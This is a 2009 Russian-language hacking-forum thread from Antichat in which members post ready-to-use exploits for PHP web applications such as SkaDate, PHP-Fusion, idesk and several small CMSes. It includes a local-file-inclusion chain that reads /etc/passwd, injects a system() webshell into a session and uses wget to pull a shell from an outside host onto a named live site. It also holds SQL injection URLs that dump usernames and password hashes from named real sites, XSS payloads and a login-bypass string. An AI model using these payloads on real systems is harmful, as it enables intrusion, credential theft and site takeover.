Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.11.2009, 18:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме: 835386
Репутация:
1463
|
|
SkaDate social networking software
Код:
http://com.skadate.com
dork: "SkaDate social networking software" filetype:php
Уязвим параметр language_id=[LFI], запоминается в куках.
/inc/class.language.php
PHP код:
function Language()
{
if( $_GET['language_id'] )
{
$this->curr_lang_id = $_GET['language_id'];
setcookie( 'language_id', $_COOKIE['language_id'], time()-1, PATH_HOME );
setcookie( 'language_id', $_GET['language_id'], time()+2592000, PATH_HOME );
}
elseif( $_COOKIE['language_id'] )
{
$this->curr_lang_id = $_COOKIE['language_id'];
}
else
{
$this->curr_lang_id = getConfig( 'def_lang_id' );
}
Находим инклуд
http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00
Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494.
Ищем сессию в /tmp/.
http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00
Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее.
Теперь сессия запомнилась в куках и инклудится на экран.
Льем минишелл в сессию
http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?>
Выполняем команду и льем минишелл для следующей команды
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id
Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги.
Абсолютный путь тоже виден, льем шелл.
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php
=======
Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990
|
|
|

09.11.2009, 20:21
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
PHP-Fusion
Bug:SQL inkection
Exploit:
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id= 5+union+all+select+1,2,user_name,4,5,6,7+from+secu rity_users--
Код:
http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
выводит в Comments
|
|
|

10.11.2009, 00:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
The DBS, v0.8.0.0 beta r1.
Файл comment.php
PHP код:
$pid = $_GET['pid'];
$hLevel = 0;
}
// Run security checks on the post we are commenting on, to make sure we are allowed to comment on it
$EntryQuery = "SELECT * FROM posts WHERE `pid` = $pid";
http://localhost/dbs/comment.php?pid=-1+union+select+1,version(),3,4,5,6,7,8,9--
|
|
|

10.11.2009, 07:48
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
From RoA with love
Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)
Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).
<script>alert();</script>
И отправляем.
/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message:
<script>alert();</script>
Пассивная XSS
/index.php?action=viewthread&thread_id="><script>al ert()</script>
From RoA with love 
|
|
|

10.11.2009, 14:57
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
idesk
Bug - SQL injection
Exploit:
/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8--
or
1+UNION+SELECT+0,0,0,@@VERSION,0,0,0,0,0--
Пример на сайте разработчика)))
Код:
http://www.nicecoder.com/support/download.php?cat_id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8/*
Дополнение от меня (автором данной баги не была указана такая информация ---
idesk - table
таблица idesk_user ((user_name, password)
пример
сайт разработчика -
Код:
http://idesk.ranacorp.com/download.php?cat_id=1+UNION+SELECT+0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0,0+from+idesk_user--
Последний раз редактировалось [x60]unu; 10.11.2009 в 17:23..
|
|
|

10.11.2009, 18:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме: 835386
Репутация:
1463
|
|
Simple PHP Agenda
http://sourceforge.net/projects/php-agenda/
SQL
edit_event.php
PHP код:
if (isset ($_GET["eventid"])) {
$eventid = mysql_real_escape_string($_GET["eventid"]);
/* Get activity information */
if ($singleAgenda)
$sql = "select * from events where id=$eventid";
else
$sql = "select * from events where id=$eventid and user_id=" . $session->id;
http://localhost/php-agenda-2.2.7/edit_event.php?eventid=-1+union+select+1,2,3,version(),user(),6,7,8,9--
|
|
|

11.11.2009, 07:27
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
KubeBlog
Раскрытие путей.
/post.php?i[]=1
content.php?i[]=1
?m=11&y[]=2009
?m[]=11&y=2009
Пассивная XSS
/login.php?ref=%22%3E%3Cscript%3Ealert();%3C/script%3E
Последний раз редактировалось Ctacok; 11.11.2009 в 07:33..
|
|
|

11.11.2009, 20:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме: 835386
Репутация:
1463
|
|
The Rat CMS
http://downloads.sourceforge.net/the-rat-cms
обход авторизации
login.php
PHP код:
$userId = $_POST['txtUserId'];
$password = $_POST['txtPassword'];
// check if the user id and password combination exist in database
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
if (mysql_num_rows($result) == 1) {
// the user id and password match,
// set the session
$_SESSION['db_is_logged_in'] = true;
// after login we move to the main page
header('Location: main.php');
exit;
} else {
$errorMessage = 'Sorry, wrong user id / password';
}
User Id : 1' or 1=1 limit 0,1 --
Password : any
SQL, XSS
http://www.opennet.ru/base/netsoft/1214498363_15515.txt.html
|
|
|

12.11.2009, 01:17
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
IF CMS version 2.0.7 SQL injection
Уязвимость хранится в скрипте frame.php:
PHP код:
...
$id = $_GET['id'];
...
PHP код:
...
$result = $dbi->sql_query("SELECT ban_trgt FROM ".$table->get('banner')." WHERE id_ban='$id'");
...
Реализация:
Код:
localhost/ifcms/frame.php?id=[SQL]
Для успешной реализации требуется magic_quotes = OFF.
oRB, благодарю за доолнение.
Последний раз редактировалось Ins3t; 12.11.2009 в 20:52..
|
|
|

12.11.2009, 23:35
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
Elusive CMS SQL injection
Уязвим скрипт download.php
PHP код:
...
$query = "SELECT * FROM incomming where id='$id'";
$result = mysql_query($query) or die("Query failed");
...
Реализация:
Код:
localhost/download.php?id=[SQL]
Для успешной реализации - magic_quotes_gpc = off
Последний раз редактировалось Ins3t; 13.11.2009 в 00:52..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|